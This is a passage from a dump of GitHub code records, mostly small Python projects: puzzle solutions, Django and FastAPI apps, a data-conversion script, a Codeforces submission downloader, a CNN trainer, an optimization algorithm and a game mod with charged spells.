\"\"\"\n Executes the main() flow\n @param argv: Command-line arguments\n @type argv: array of strings\n \"\"\"\n l = ListNode(1, ListNode(0, ListNode(1, ListNode(1, ListNode(0)))))\n s = Solution()\n print('Decimal: ', s.getDecimalValue(l))\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n# Input: Linked list with 1 or 0\n# Output: Decimal representation from binary\n# Example: [1, 0, 0] would be 4\n# Option 1: Go over linked list, create array and add numbers\n# to front of array. Then go over array and multiple with power\n# of index.\n# Time: O(N), Space: O(N)\nclass Solution:\n def getDecimalValue(self, head: ListNode) -> int:\n # error checking\n if head is None:\n return -1\n\n decimal = 0\n arr = []\n\n # go over the linked list and insert to front of array\n node = head\n while (node is not None):\n arr.insert(0, node.val)\n node = node.next\n\n # multiply results\n i = 0\n n = len(arr)\n while i < n:\n if arr[i] == 1:\n decimal += pow(2, i)\n i += 1\n\n return decimal\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])","repo_name":"iizrailevsky/various-problems","sub_path":"modules/main/src/main/python/decimalValFromLinkedList.py","file_name":"decimalValFromLinkedList.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42515146950","text":"from django.db import models\nfrom apps.users.models import UserProfile\nfrom datetime import datetime\nfrom DjangoUeditor.models import UEditorField\n\n\n# Create your models here.\nclass BlogArt(models.Model):\n title = models.CharField(max_length=50, null=False, verbose_name=\"文章标题\")\n author = models.ForeignKey(UserProfile, on_delete=models.CASCADE, verbose_name=\"作者\")\n label = models.CharField(max_length=50, verbose_name=\"标签\")\n add_time = models.DateTimeField(default=datetime.now, verbose_name=\"添加时间\")\n content = UEditorField(width=\"120%\", height=600, toolbars='normal', imagePath=\"blog/images/\", filePath=\"blog/files/\", default=\"\", verbose_name=u\"文章内容\")\n\n class Meta:\n verbose_name = \"文章管理\"\n verbose_name_plural = verbose_name\n\n def __str__(self):\n return self.title","repo_name":"souno-git/Django-env-base","sub_path":"BRITmanage/apps/blog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14558251264","text":"# Read MB vaccination data\n\nimport numpy as np\nimport datetime\nfrom datetime import timedelta\n\nregional_abbreviations = {\n 'All':'mb',\n 'Interlake-Eastern':'ie',\n 'Northern':'no',\n 'Prairie Mountain Health':'pm',\n 'Southern Health-Santé Sud':'sh',\n 'Winnipeg':'wg'\n }\n\nfirst_doses = {'header':'Cumulative_First_Doses', 'sym':'xt', 'dict_by_date': {}, 'column':None}\ncsv_data = [first_doses]\n\ndate_data = {'header':'Vaccination_Date', 'sym':'', 'column':None}\ndata = csv_data+[date_data]\n\nfile = 'Manitoba_COVID-19_Vaccinations_-_Daily_Statistics.csv'\n\nend_date = datetime.date(2020, 3, 1)\n\nwith open(file) as f:\n for i,line in enumerate(f):\n fields = line.split(',')\n if i == 0:\n for i_field,field in enumerate(fields):\n for datum in data:\n if datum['header'] == field:\n datum['column'] = i_field\n break\n else:\n raw_datetime = fields[date_data['column']]\n raw_date = raw_datetime.split(' ')[0]\n dd = raw_date.split('/')\n if len(dd) == 3:\n date = datetime.date(int(dd[0]), int(dd[1]), int(dd[2]))\n if (date - datetime.date(2020,2,29)).days > 0:\n for datum in csv_data:\n dict_by_date = datum['dict_by_date']\n value = (fields[datum['column']]).strip()\n dict_by_date[date] = value\n\n if (date - end_date).days > 0:\n end_date = date\n\nstart_date = datetime.date(2020, 3, 1)\nwith open('mb-vacc-pypm.csv', 'w') as the_file:\n\n hbuff = ['date']\n for rha_name in regional_abbreviations:\n rha = regional_abbreviations[rha_name]\n for datum in csv_data:\n hbuff.append(rha + '-' + datum['sym'])\n the_file.write(','.join(hbuff) + '\\n')\n\n ndays = (end_date - start_date).days + 1\n for i in range(ndays):\n date = start_date + datetime.timedelta(days=i)\n buff = [str(date)]\n for rha_name in regional_abbreviations:\n rha = regional_abbreviations[rha_name]\n if rha == 'mb':\n for datum in csv_data:\n dict_by_date = datum['dict_by_date']\n if date in dict_by_date:\n buff.append(dict_by_date[date])\n else:\n buff.append('')\n else:\n buff.append('')\n\n the_file.write(','.join(buff) + '\\n')\n","repo_name":"pypm/data","sub_path":"covid19/Manitoba/make_mb_vacc_csv.py","file_name":"make_mb_vacc_csv.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36890886968","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 24 02:29:11 2020\n\n@author: pranay\n\"\"\"\n\nimport requests\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport pyperclip as clipboard\nimport os\nimport time\nimport json\n\nuser_handle = \"pranay_garg\"\nbase_url = \"https://codeforces.com/api/\"\napi_name = \"\"\n \ndef contest_list() : \n\n api_name = \"contest.list\"\n st = time.time()\n et = time.time()\n response = requests.get(base_url+api_name)\n print(\"time to fetch contest list : \",time.time()-st)\n \n valid_contest = [] \n\n api_name = \"contest.status\"\n\n for item in response.json()['result'] : \n print(\"running\")\n\n if item['phase'] != \"FINISHED\" : \n continue\n \n parameters = {\n \"contestId\" : item[\"id\"],\n \"handle\" : user_handle\n }\n \n subs = []\n st = time.time()\n res = requests.get(base_url+api_name,parameters)\n print(\"time to fetch subs list for curr contest :\",time.time()-st)\n\n if(res.json()['status']!='OK') :\n continue\n\n sub_list = res.json()['result']\n \n if len(sub_list) == 0:\n continue\n\n st = time.time()\n for val in sub_list :\n if val['verdict'] == \"OK\" : \n subs.append({\n \"id\" : val['id'],\n \"index\" : val['problem']['index'],\n \"name\" : val['problem']['name']\n })\n print(\"time to iterate over all subs\",time.time()-st)\n\n if len(subs) == 0:\n continue\n \n valid_contest.append({\n \"id\" : item['id'],\n \"name\" : item['name'],\n \"subs\" : subs\n })\n print(\"total time required :\",time.time()-et)\n return valid_contest\n\nval = contest_list()\nwith open(\"valid_contest.txt\",'w') as f : \n json.dump(json.dumps(val), f)\n\n# with open(\"valid_contest.txt\",'r') as f :\n# temp = json.load(f)\n \n# val = json.loads(temp)\n\nsubmission_url = \"https://codeforces.com/contest/\"\n\ndriver = webdriver.Chrome(\"/usr/bin/chromedriver\")\n\nbase_dir = '/media/pranay/PG/PRANAY/Competitive Coding/competitive-submissions/codeforces-submissions'\nos.chdir(base_dir)\n\n\nfor c in val : \n if os.path.exists(os.path.join(os.getcwd(), c['name'])) == True :\n continue\n os.mkdir(c['name'])\n new_dir = os.path.join(os.getcwd(), c['name'])\n os.chdir(new_dir)\n print(c['id'],c['name'])\n \n\n done = {}\n\n for s in c['subs']:\n curr_url = submission_url+str(c['id'])+'/submission/'+str(s['id'])\n driver.get(curr_url)\n driver.find_element(By.CLASS_NAME,\"source-copier\").click()\n data = clipboard.paste()\n # print(data)\n \n file_name = str(s['index'])+\". \"+s['name']\n if str(s['index']) not in done.keys():\n done[str(s['index'])] = 1\n else:\n file_name += str(done[str(s['index'])])\n done[str(s['index'])]+=1\n \n file_name += '.cpp'\n file_name = file_name.replace('/','-')\n file_name = file_name.replace('?','')\n file_name = file_name.replace('*','')\n \n with open(file_name,'w') as f : \n print(data,file = f)\n time.sleep(3)\n \n os.chdir(base_dir)","repo_name":"pg30/Competitive-Submissions","sub_path":"codeforces_script.py","file_name":"codeforces_script.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24710827812","text":"import pandas as pd\nimport os, random\nimport cv2 as cv\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tensorflow import keras\nfrom TrafficDetection.imageOperations import augmentDataInFiles\nfrom distutils.dir_util import copy_tree, remove_tree\nfrom sklearn.model_selection import train_test_split\nfrom kerastuner.tuners import RandomSearch\n\nimg_path = \"data/images/\"\n\n# Import labels.csv\nlabels_dataset = pd.read_csv(\"data/labels.csv\")\ntemp_labels = labels_dataset.iloc[:, 0]\n\n########### Uncomment below code if augmented data is lost ###########################\n# Import images\ni = 0\n# max_count = 2010\n# while i < 43:\n# file_count = 0\n# current_path = img_path + str(i) + \"/\"\n# # print(current_path)\n# for file in os.listdir(current_path):\n# img = cv.imread(os.path.join(current_path, file), 0)\n# # temp_img_list.append(img)\n# # temp_label_list.append(temp_train_labels[i])\n# file_count += 1\n# print(file_count)\n# augment_count = max_count - file_count\n# print(augment_count)\n# save_path = current_path + \"new/\"\n# if not os.path.exists(save_path):\n# os.makedirs(save_path)\n# if(augment_count < file_count):\n# new_files = 2\n# else:\n# new_files = round(augment_count / file_count)\n# print(new_files)\n# augmentDataInFiles(noOfNewFiles=new_files, fromDir=current_path, saveDir=save_path, maxFiles=augment_count)\n# copy_tree(save_path, current_path)\n# remove_tree(save_path)\n# i += 1\n\nprint(\"Image data adjustments done\")\n\n# Initialize the lists\nlabel_count = 0\ntemp_img_list = []\ntemp_label_list = []\n\n# Store the augmented images and labels\nwhile i < 43:\n file_count = 0\n current_path = img_path + str(i) + \"/\"\n print(current_path)\n for file in os.listdir(current_path):\n img = cv.imread(os.path.join(current_path, file), 0)\n temp_img_list.append(img)\n temp_label_list.append(temp_labels[i])\n file_count += 1\n i += 1\n print(file_count)\n\n# Convert the lists to numpy arrays\nall_images = np.array(temp_img_list)\nall_labels = np.array(temp_label_list)\n\n# Create separate training and test data\ntrain_images, test_images, train_labels, test_labels = train_test_split(all_images, all_labels, test_size=0.2,\n shuffle=True)\n\n# Normalize the image data\ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\norig_test_images = test_images\n\n# Reshape the arrays according to CNN input\ntrain_images = train_images.reshape(len(train_images), 32, 32, 1)\ntest_images = test_images.reshape(len(test_images), 32, 32, 1)\n\n\n################## Training part #######################\n# For Hyper-parameter optimization\ndef build_model(hp):\n model = keras.Sequential()\n model.add(keras.layers.Conv2D(\n filters=hp.Int('conv_1_filter', min_value=128, max_value=256, step=16),\n kernel_size=hp.Choice('conv_1_kernel', values=[3, 5]),\n activation='relu',\n input_shape=(32, 32, 1)\n ))\n model.add(keras.layers.Dropout(0.3))\n model.add(keras.layers.Conv2D(\n filters=hp.Int('conv_2_filter', min_value=64, max_value=128, step=16),\n kernel_size=hp.Choice('conv_2_kernel', values=[3, 5]),\n activation='relu'\n ))\n model.add(keras.layers.Dropout(0.3))\n model.add(keras.layers.MaxPool2D(pool_size=(2, 2)))\n model.add(keras.layers.Flatten())\n model.add(keras.layers.Dense(\n units=hp.Int('dense_1_units', min_value=64, max_value=256, step=32),\n activation='relu'\n ))\n model.add(keras.layers.Dropout(0.5))\n model.add(keras.layers.Dense(43, activation='softmax'))\n\n model.compile(\n optimizer=keras.optimizers.Adam(hp.Choice('learning_rate', values=[1e-2, 1e-3, 1e-4])),\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n return model\n\n\ntuner = RandomSearch(\n build_model,\n objective='val_accuracy',\n max_trials=5,\n directory='output',\n project_name='models'\n)\n\n# Search for the best model\ntuner.search(train_images, train_labels, epochs=3, validation_split=0.1)\n\nmodel = tuner.get_best_models(num_models=1)[0]\n\nmodel.summary()\n\n# Train the data with the best model\nmodel.fit(train_images, train_labels, batch_size=100, epochs=10, validation_split=0.1, initial_epoch=3)\n\n# Check the test data\nm = 0\nimg = test_images[m]\nimg = np.expand_dims(img, axis=0)\nprediction = model.predict_classes(img)\nplt.imshow(orig_test_images[0])\nplt.show()\nprint(prediction)\nprint(\"Original :\")\nprint(test_labels[m])\n\n#################### Just for printing things ##########################\n\n# print(train_images.shape)\n# print(train_labels.shape)\n# print(test_images.shape)\n# print(test_labels.shape)\n# plt.imshow(train_images[10])\n# plt.show()\n# cv.waitKey(0)\n# print(train_labels[10])\n","repo_name":"sanjit1995/Traffic-Sign-Detector","sub_path":"trafficSign.py","file_name":"trafficSign.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74680966519","text":"class Atm:\r\n def __init__(self,cardno,pin):\r\n self.cardno=cardno\r\n self.pin=pin\r\n def checkBalance(self):\r\n print(\"Your balance is 200000\")\r\n def debitAmount(self,amount):\r\n\r\n leftAmount=200000-amount\r\n print(\"you have withdrawn :\"+str(amount)+\"Your remaining balance is:\"+str(leftAmount))\r\n\r\ndef main():\r\n cardNo=input(\"Enter your card no.:\") \r\n pinNo=input(\"Enter your pin:\") \r\n \r\n atmCard=Atm(cardNo,pinNo)\r\n\r\n print(\"Choose your action:\")\r\n print(\"1.Balance Enquiry 2.Withdrawlat\")\r\n action=int(input(\"enter your choice:\"))\r\n\r\n if(action==1):\r\n atmCard.checkBalance()\r\n elif(action==2):\r\n amount=int(input(\"enter your anount to be withdrawl:\"))\r\n atmCard.debitAmount(amount)\r\n else:\r\n print(\"enter a valid choice\")\r\n \r\n \r\nif __name__==\"__main__\":\r\n main()\r\n \r\n\r\n ","repo_name":"Prajit-Shandilya/Bank-Atm","sub_path":"Home Assignment C-100/Atm.py","file_name":"Atm.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5581984957","text":"from fastapi import FastAPI, Body\nfrom database import *\nfrom datetime import datetime\nfrom fastapi.middleware.cors import CORSMiddleware\nimport os\n\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\n@app.get(\"/\")\ndef root():\n return {\"status\": \"ready\"}\n\n\n@app.get(\"/get_subjects\")\ndef get_subjects():\n subjects = select_all_subjects()\n subjects_list = [f\"{i[0]}\" for i in subjects]\n return subjects_list\n\n\n@app.get(\"/get_classes\")\ndef get_teachers():\n classes = select_all_classes()\n classes_list = [f\"{i[0]}\" for i in classes]\n return classes_list\n\n\n@app.get(\"/get_lessons_plan\")\ndef get_lessons_plan(date, class_name):\n datetime_date = datetime.strptime(date, f\"%d-%m-%Y\")\n data = select_lessons_data(date=datetime_date, class_name=class_name)\n return str (data)\n\n\n# @app.post(\"/input_lessons_plan\")\n# def input_lessons_plan(class_name, subject_name, teacher_name, teacher_lastname, start_lesson, end_lesson, lesson_date):\n@app.get(\"/get_teachers\")\ndef get_teachers():\n teachers = select_all_teachers()\n teachers_list = [f\"{i[0]} {i[1]}\" for i in teachers]\n return teachers_list\n\n\n@app.get(\"/add_teacher\")\ndef add_teacher(teacher_name, teacher_lastname):\n input_teacher_data(teacher_name=teacher_name, teacher_lastname=teacher_lastname)\n return {\"status\": \"ok\"}\n\n\n@app.get(\"/add_class\")\ndef add_class(class_name):\n input_class_data(class_name=class_name.lower())\n return {\"status\": \"ok\"}\n\n\n# [1b, Matematyka, Mateusz, Kozłowski, 06-06-2023, 8.30, 9,30]\n\n@app.post(\"/add_lessons\")\ndef add_lessons(data: dict = Body(...)):\n # print(data[\"class_name\"], data[\"subject_name\"], data[\"teacher_name\"].split()[0],\n # data[\"teacher_name\"].split()[1],\n # data[\"lesson_ date\"], data[\"start_lesson\"], data[\"end_lesson\"])\n input_lesson_data(class_name=data[\"class_name\"], subject_name=data[\"subject_name\"], teacher_name=data[\"teacher_name\"].split()[0],\n teacher_lastname=data[\"teacher_name\"].split()[1],\n lesson_date=data[\"lesson_date\"], start_lesson=data[\"start_lesson\"], end_lesson=data[\"end_lesson\"])\n return {\"status\": \"ok\"}\n\n\nif __name__ == \"__main__\":\n os.system(\"python -m uvicorn main:app --reload\") # --host 0.0.0.0\n","repo_name":"VodkaAzFYR/DataBasesProject2023","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9888978860","text":"#The program prints out an isoceles triangle with height given\r\n#Student no.:TMXTHA006\r\n#Name: TEMA, Thabo Hebert\r\n#Date: 20 March 2014\r\n\r\nh = eval(input(\"Enter the height of the triangle:\\n\"))\r\np = 1\r\nq = h-1\r\nfor i in range(h):\r\n print(\" \"*q, \"*\"*p, sep=\"\")\r\n q-=1\r\n p+=2","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_3/tmxtha006/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2111231281","text":"#!/usr/bin/env python\n# Created by \"Thieu\" at 07:03, 18/03/2020 ----------%\n# Email: nguyenthieu2102@gmail.com %\n# Github: https://github.com/thieu1995 %\n# --------------------------------------------------%\n\nimport numpy as np\nfrom mealpy.optimizer import Optimizer\n\n\nclass OriginalHGSO(Optimizer):\n \"\"\"\n The original version of: Henry Gas Solubility Optimization (HGSO)\n\n Links:\n 1. https://www.sciencedirect.com/science/article/abs/pii/S0167739X19306557\n\n Hyper-parameters should fine-tune in approximate range to get faster convergence toward the global optimum:\n + n_clusters (int): [2, 10], number of clusters, default = 2\n\n Examples\n ~~~~~~~~\n >>> import numpy as np\n >>> from mealpy.physics_based.HGSO import OriginalHGSO\n >>>\n >>> def fitness_function(solution):\n >>> return np.sum(solution**2)\n >>>\n >>> problem_dict1 = {\n >>> \"fit_func\": fitness_function,\n >>> \"lb\": [-10, -15, -4, -2, -8],\n >>> \"ub\": [10, 15, 12, 8, 20],\n >>> \"minmax\": \"min\",\n >>> }\n >>>\n >>> epoch = 1000\n >>> pop_size = 50\n >>> n_clusters = 3\n >>> model = OriginalHGSO(epoch, pop_size, n_clusters)\n >>> best_position, best_fitness = model.solve(problem_dict1)\n >>> print(f\"Solution: {best_position}, Fitness: {best_fitness}\")\n\n References\n ~~~~~~~~~~\n [1] Hashim, F.A., Houssein, E.H., Mabrouk, M.S., Al-Atabany, W. and Mirjalili, S., 2019. Henry gas solubility\n optimization: A novel physics-based algorithm. Future Generation Computer Systems, 101, pp.646-667.\n \"\"\"\n\n def __init__(self, epoch=10000, pop_size=100, n_clusters=2, **kwargs):\n \"\"\"\n Args:\n epoch (int): maximum number of iterations, default = 10000\n pop_size (int): number of population size, default = 100\n n_clusters (int): number of clusters, default = 2\n \"\"\"\n super().__init__(**kwargs)\n self.epoch = self.validator.check_int(\"epoch\", epoch, [1, 100000])\n self.pop_size = self.validator.check_int(\"pop_size\", pop_size, [10, 10000])\n self.n_clusters = self.validator.check_int(\"n_clusters\", n_clusters, [2, int(self.pop_size/5)])\n self.set_parameters([\"epoch\", \"pop_size\", \"n_clusters\"])\n self.n_elements = int(self.pop_size / self.n_clusters)\n self.sort_flag = False\n self.T0 = 298.15\n self.K = 1.0\n self.beta = 1.0\n self.alpha = 1\n self.epsilon = 0.05\n self.l1 = 5E-2\n self.l2 = 100.0\n self.l3 = 1E-2\n\n def initialize_variables(self):\n self.H_j = self.l1 * np.random.uniform()\n self.P_ij = self.l2 * np.random.uniform()\n self.C_j = self.l3 * np.random.uniform()\n self.pop_group, self.p_best = None, None\n\n def initialization(self):\n if self.pop is None:\n self.pop = self.create_population(self.pop_size)\n self.pop_group = self.create_pop_group(self.pop, self.n_clusters, self.n_elements)\n self.p_best = self.get_best_solution_in_team__(self.pop_group) # multiple element\n\n def flatten_group__(self, group):\n pop = []\n for idx in range(0, self.n_clusters):\n pop += group[idx]\n return pop\n\n def get_best_solution_in_team__(self, group=None):\n list_best = []\n for i in range(len(group)):\n _, best_agent = self.get_global_best_solution(group[i])\n list_best.append(best_agent)\n return list_best\n\n def evolve(self, epoch):\n \"\"\"\n The main operations (equations) of algorithm. Inherit from Optimizer class\n\n Args:\n epoch (int): The current iteration\n \"\"\"\n ## Loop based on the number of cluster in swarm (number of gases type)\n for i in range(self.n_clusters):\n ### Loop based on the number of individual in each gases type\n pop_new = []\n for j in range(self.n_elements):\n F = -1.0 if np.random.uniform() < 0.5 else 1.0\n\n ##### Based on Eq. 8, 9, 10\n self.H_j = self.H_j * np.exp(-self.C_j * (1.0 / np.exp(-epoch / self.epoch) - 1.0 / self.T0))\n S_ij = self.K * self.H_j * self.P_ij\n gama = self.beta * np.exp(- ((self.p_best[i][self.ID_TAR][self.ID_FIT] + self.epsilon) /\n (self.pop_group[i][j][self.ID_TAR][self.ID_FIT] + self.epsilon)))\n X_ij = self.pop_group[i][j][self.ID_POS] + F * np.random.uniform() * gama * \\\n (self.p_best[i][self.ID_POS] - self.pop_group[i][j][self.ID_POS]) + \\\n F * np.random.uniform() * self.alpha * (S_ij * self.g_best[self.ID_POS] - self.pop_group[i][j][self.ID_POS])\n pos_new = self.amend_position(X_ij, self.problem.lb, self.problem.ub)\n pop_new.append([pos_new, None])\n if self.mode not in self.AVAILABLE_MODES:\n pop_new[-1][self.ID_TAR] = self.get_target_wrapper(pos_new)\n pop_new = self.update_target_wrapper_population(pop_new)\n self.pop_group[i] = pop_new\n self.pop = self.flatten_group__(self.pop_group)\n\n ## Update Henry's coefficient using Eq.8\n self.H_j = self.H_j * np.exp(-self.C_j * (1.0 / np.exp(-epoch / self.epoch) - 1.0 / self.T0))\n ## Update the solubility of each gas using Eq.9\n S_ij = self.K * self.H_j * self.P_ij\n ## Rank and select the number of worst agents using Eq. 11\n N_w = int(self.pop_size * (np.random.uniform(0, 0.1) + 0.1))\n ## Update the position of the worst agents using Eq. 12\n sorted_id_pos = np.argsort([x[self.ID_TAR][self.ID_FIT] for x in self.pop])\n\n pop_new = []\n pop_idx = []\n for item in range(N_w):\n id = sorted_id_pos[item]\n X_new = np.random.uniform(self.problem.lb, self.problem.ub)\n pos_new = self.amend_position(X_new, self.problem.lb, self.problem.ub)\n pop_idx.append(id)\n pop_new.append([pos_new, None])\n if self.mode not in self.AVAILABLE_MODES:\n pop_new[-1][self.ID_TAR] = self.get_target_wrapper(pos_new)\n pop_new = self.update_target_wrapper_population(pop_new)\n for idx, id_selected in enumerate(pop_idx):\n self.pop[id_selected] = pop_new[idx].copy()\n self.pop_group = self.create_pop_group(self.pop, self.n_clusters, self.n_elements)\n self.p_best = self.get_best_solution_in_team__(self.pop_group)\n","repo_name":"thieu1995/mealpy","sub_path":"mealpy/physics_based/HGSO.py","file_name":"HGSO.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"en","doc_type":"code","stars":587,"dataset":"github-code","pt":"40"} +{"seq_id":"5860007214","text":"## 19. Remove Nth Node From End of List\n## https://leetcode.com/problems/remove-nth-node-from-end-of-list/\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n nthhead = head\n tail = head\n count = 0\n while tail:\n tail = tail.next\n if not(tail):\n if nthhead==head and count==n-1:\n head = head.next\n else:\n nthhead.next = nthhead.next.next\n count+=1\n \n if count>n:\n nthhead = nthhead.next\n return head","repo_name":"sayanbasak0/letscode","sub_path":"python3/p19_medium.py","file_name":"p19_medium.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36394108445","text":"\"\"\"BM URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', admin.site.urls),\n path('home', views.home),\n path('product', views.product_list),\n path('product/', views.product_detail),\n path('product/filter',views.product_filter),\n path('company', views.company_list),\n path('company/',views.company_detail),\n path('company/filter',views.company_filter),\n path('company/product/',views.company_product),\n # path('company/filter/count',views.company_count),\n path('customer', views.customer_list),\n path('customer/',views.customer_detail),\n path('customer/filter',views.customer_filter),\n path('category',views.category_list),\n path('category/',views.category_detail),\n path('category/filter',views.category_filter),\n path('category/product/',views.category_product),\n path('prodType',views.prodType_list),\n path('prodType/',views.prodType_detail),\n path('prodType/filter',views.prodType_filter),\n path('prodType/product/',views.prodType_product),\n path('state',views.state_list),\n path('state/',views.state_detail),\n path('state/filter',views.state_filter),\n path('state/product/',views.state_product),\n]\n","repo_name":"maagii9922/BM","sub_path":"BM/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23581364000","text":"N,Q = list(map(int,input().split()))\r\nS = input()\r\nslen = len(S)\r\nquery = [list(map(int,input().split())) for _ in range(Q)]\r\n \r\n# print(query)\r\n \r\n# abcdefghijk > fghijkabcde\r\n \r\n# print(S)\r\nidx = 0\r\nfor q in query:\r\n if q[0] == 1:\r\n idx += q[1]\r\n if idx >= slen:\r\n idx -= slen\r\n else:\r\n# if q[1]-idx-1 > slen:\r\n# print(S[q[1]-idx-1-slen], idx)\r\n# else:\r\n# print(S[q[1]-idx-1], idx)\r\n print(S[q[1]-idx-1])","repo_name":"takeharu73/atcoder","sub_path":"ABC/20220702_ABC258/C - Rotation.py","file_name":"C - Rotation.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71195170361","text":"from Level import *\n\n# Add the base directory to sys.path for testing- allows us to run the mod directly for quick testing\nimport sys\nsys.path.append('../..')\n\nimport Spells\nimport Upgrades\n\nimport mods.API_ChargedSpells.API_ChargedSpells as API_ChargedSpells\n\nprint(\"Basic Charged Spells Mod Loaded\")\nclass InstakillSpell(API_ChargedSpells.BoundSpell):\n\n\tdef on_init(self):\n\t\tsuper(InstakillSpell, self).on_init()\n\t\tself.name = \"Instakill\"\n\n\t\tself.damage = 999\n\t\tself.can_target_self = False\n\t\tself.level = 1 # self.level = 3 \n\t\tself.tags = [Tags.Arcane, Tags.Sorcery]\n\t\tself.bound_range = 10\n\t\tself.max_charges = 3\n\t\tself.required_charge = 4 # this is how many turns the spell must charge for\n\n\t\tself.charging_effect_color = Tags.Arcane.color\n\n\n\tdef on_cast(self, x, y):\n\t\t# deal damage to target\n\t\tself.caster.level.deal_damage(x, y, self.get_stat('damage'), Tags.Arcane, self) \n\t\tyield\n\t\treturn\n\n\t\n\tdef get_description(self):\n\t\ttry:\n\t\t\treturn (\"Spend {required_charge} turns charging to prepare this spell.\\n\"\n\t\t\t\t\t\"Channel the spell to charge it. Once prepared, it remains prepared until it's used again.\\n\"\n\t\t\t\t\t\"Deals [{damage}_arcane:arcane] damage to a target when used after being prepared.\").format(**self.fmt_dict())\n\t\texcept:\n\t\t\treturn 'error'\n\n\nSpells.all_player_spell_constructors.append(InstakillSpell)\n\nfrom CommonContent import SimpleMeleeAttack as SimpleMeleeAttack\nclass SummonEldrichIncantation(API_ChargedSpells.IncantationSpell):\n\tdef on_init(self):\n\t\tsuper(SummonEldrichIncantation, self).on_init()\n\t\tself.name = \"Summon Eldrich Thing\"\n\n\t\tself.range = 4\n\t\tself.max_charges = 3\n\t\tself.tags = [Tags.Conjuration, Tags.Arcane]\n\t\tself.level = 1 # self.level = 3\n\t\tself.required_charge = 5 # this is how many turns the spell must charge for\n\n\t\tself.minion_health = 50\n\t\tself.minion_damage = 15\n\n\t\tself.charging_effect_color = Tags.Arcane.color\n\t\t\n\n\tdef on_cast(self, x, y):\n\t\teldrichThing = Unit()\n\t\teldrichThing.max_hp = self.get_stat('minion_health')\n\t\teldrichThing.team = self.caster.team\n\t\teldrichThing.asset_name = os.path.join(\"..\",\"..\",\"mods\",\"BasicChargedSpells\",\"eldrich_thing\")\n\n\t\teldrichThing.name = \"Eldrich Thing\"\n\t\teldrichThing.sprite.color = Color(200, 50, 200)\n\t\teldrichThing.flying = False\n\t\teldrichThing.description = \"A basic eldrich horror\"\n\t\teldrichThing.spells.append(SimpleMeleeAttack(self.get_stat('minion_damage')))\n\t\teldrichThing.tags = [Tags.Arcane]\n\t\teldrichThing.resists[Tags.Arcane] = 100\n\n\t\tself.summon(eldrichThing, Point(x, y))\n\t\tyield\n\n\tdef get_description(self):\n\t\ttry:\n\t\t\treturn (\"Summon an eldrich thing after {required_charge} turns spent charging (channel the spell to charge it).\\n\"\n\t\t\t\t\t\"The thing has [{minion_health}_HP:minion_health].\\n\"\n\t\t\t\t\t\"Eldrich things have a melee attack which deals [{minion_damage}_physical:physical] damage.\").format(**self.fmt_dict())\n\t\texcept:\n\t\t\treturn 'error'\n\n\nSpells.all_player_spell_constructors.append(SummonEldrichIncantation)\n\n\nclass PowerupFireball(API_ChargedSpells.PowerupSpell):\n\tdef on_init(self):\n\t\tsuper(PowerupFireball, self).on_init()\n\t\tself.name = \"Inferno Fireball\"\n\n\t\tself.upgrades['set_bound_on_interrupted'] = (1, 1, \"Bound Fireball\", \"The fireball spell becomes bound when charging completes or is interrupted.\")\n\t\tself.upgrades['damage_boost_on_charge'] = (1, 1, \"Charge Damage\", \"The fireball spell deals 3 extra damage per turn charged.\")\n\n\t\tself.damage = 10\n\t\tself.can_target_self = False\n\t\tself.level = 1 # self.level = 2\n\t\tself.tags = [Tags.Fire, Tags.Sorcery]\n\t\tself.range = 15\n\t\tself.radius = 3\n\t\tself.max_charges = 10\n\t\tself.max_charge = 4 # this is how many turns the spell 